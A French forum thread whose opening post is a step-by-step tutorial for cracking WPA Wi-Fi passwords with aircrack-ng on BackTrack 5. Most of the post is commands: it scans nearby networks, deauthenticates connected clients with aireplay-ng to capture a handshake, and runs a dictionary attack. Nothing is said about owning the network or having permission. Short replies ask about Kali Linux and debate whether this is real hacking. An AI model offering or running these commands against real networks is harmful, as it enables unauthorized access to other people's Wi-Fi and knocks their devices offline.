Annonce

Réduire
Aucune annonce.

Crack WPA BackTrack

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Crack WPA BackTrack

    Bonsoir,

    je ne ferais pas d'image, car je rédige ce tutoriel sous Windows !!

    Donc tout d'abord, tout ce passe dans la parti console de backtrack, pour ce tutoriel, j'utiliserais BackTrack 5
    A l’exception de l'extraction du dico ou on retournera sur le deskTop

    ( le debut de ce tuto ressemble beaucoup au tuto sur le WEP !! )
    Donc, lancer une console !!

    Ecrivez dedans :
    airmon-ng
    Elle aura pour but de vous affichez tous vos interface WIFI

    Ensuite, il va falloir activer l'interface wifi souhaiter pour qu'elle passe en " mon0 " pour cela aussi simple que l'autre commande :

    airmon-ng start ton interface wifi
    Ensuite, il va falloir lancer airodump-ng tout simple faites :

    airodump-ng interfacewifi
    ensuite, sa vas scanné toute les connexion de vos alentour !! cependant vu que l'ont vas cracké une connexion de type WPA, je vous recommande pour plus de lisibilité de faire :

    airodump-ng --encrypt wpa interfacewifi
    cette commande aura pour but de scanné toutes les connexion WPA !! mieux non ?

    ensuite ont va choisir la connexion que l'ont souhaite !! :

    airodump-ng --write Nom_Fichier_Sortie --channel Canal --bssid le bssid interfacewifi
    Je recommande cette commande qui fait le même effet que celle que je vous ai faite au dessus :

    airodump-ng -w Nom_Fichier_Sortie -c Canal --bssid le Bssid interfacewifi
    Ensuite, il vas falloir capturé un HandShake !!

    Il nous faut un Handshake pour pouvoir lancer le dico, il va falloir faire une désauthentification des stations connectés !!

    Passons a la commande :

    aireplay-ng -0 1 -a Bssid_Du_Reseau -c Bssid_De_La_Station interwifi
    L'adresse mac de la station n'est pas obligatoire, mais elle et fortement recommandé !!

    Il vous faut une station de connecté pour pouvoir faire la suite, sinon changer de connexion WPA !!

    Après la désauthentification, attendez un instant le temps que le client se reconnecte. Vous devriez avoir récupéré un Handshake. Pour le vérifier, il suffit de lancer aircrack :

    aircrack-ng -z *.cap
    Sa va lire les paquets, et ensuite sa va vous sortir toutes la listes des connexion, et vous verrez dans la liste votre connexion avec dans la colonnes de droites, le type de cryptage, avec le handshake de récupérer

    Après ceci !! nous allons décompresser notre dico

    mon dico on va dire qu'il est stocker dans le DeskTop !!

    Donc on va se rendre dans le desktop

    cd Desktop
    puis,

    zcat Nom_Dico_Compressé.gz | egrep -v '^#' > Nom_Dico_Décompressé
    Maintenant, ils nous restent plus qu'a cracké la connexion avec aircrack-ng

    Il faut revenir au repertoire d'origine en faisant :

    cd
    puis,

    aircrack-ng -w Chemin_Du_Dico -0 *.cap
    le -0 est une option que j'aime bien sa coloris l'ecran en vert a la matrix ^^

    Maintenant que tout cela est fini !! ^^

    Allez boire un café, allez ensuite dormir et revenez peut-être auriez vous de la chance, sa auras peut-être fonctionné ^^

  • #2
    Pour Kali-Linux il faut faire comment ?

    Commentaire


    • #3
      De la même manière.


      Suivre Hackademics: Twitter, Google+, Facebook.

      Commentaire


      • #4
        Merci pour ce tutoriel, mais ce n'est pas vraiment du hacking, si ?

        Commentaire


        • #5
          Pourquoi ça n'en serait pas ?

          Cf: Définition du hacking


          Suivre Hackademics: Twitter, Google+, Facebook.

          Commentaire


          • #6
            Je ne sais pas, j'ai encore cette vision biaisée du hacking, ou la personne derrière l'ordinateur sait faire des choses incroyables, ou le piratage ne se trouve que dans le cerveau de quelques-uns et non pas sur Internet...
            Faut que je démystifie !

            Commentaire

            Chargement...
            X